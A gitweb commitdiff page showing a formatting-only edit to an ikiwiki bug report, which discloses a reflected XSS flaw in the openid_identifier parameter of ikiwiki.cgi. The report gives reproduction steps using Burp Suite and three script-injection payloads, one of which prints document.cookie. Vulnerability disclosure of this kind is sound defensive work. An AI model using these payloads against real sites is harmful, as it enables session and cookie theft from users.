]> git.vanrenterghem.biz Git - git.ikiwiki.info.git/commitdiff
projects / git.ikiwiki.info.git / commitdiff
? search:
summary | shortlog | log | commit | commitdiff | tree
raw | patch | inline | side by side (parent: c68c044)
fix formatting
authorhttp://smcv.pseudorandom.co.uk/ <smcv@web>
Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
committeradmin <admin@branchable.com>
Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
doc/bugs/XSS_Alert...__33____33____33__.mdwn patch | blob | history

diff --git a/doc/bugs/XSS_Alert...__33____33____33__.mdwn b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
index 436e3faaec1fed04fa5d37e04bd14419db1168d8..2c147073a018d42e3e3be4cb56ea47e6d4b92007 100644 (file)
--- a/doc/bugs/XSS_Alert...__33____33____33__.mdwn
+++ b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
@@ -5,14 +5,16 @@ Vulnerable Links:
 webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 
 How To Reproduce The Vulnerability :
 webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 
 How To Reproduce The Vulnerability :
+
 1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
 3. forward the request
 
 XSS Payload :
 1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
 3. forward the request
 
 XSS Payload :
-1. "></script><script>prompt(909043)</script>
-2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
-3. "></script><script>prompt(document.cookie)</script>
+
+1. `"></script><script>prompt(909043)</script>`
+2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
+3. `"></script><script>prompt(document.cookie)</script>`
 
 NOTE : Proof of concept is attached.
 
 
 NOTE : Proof of concept is attached.
 
Unnamed repository; edit this file 'description' to name the repository.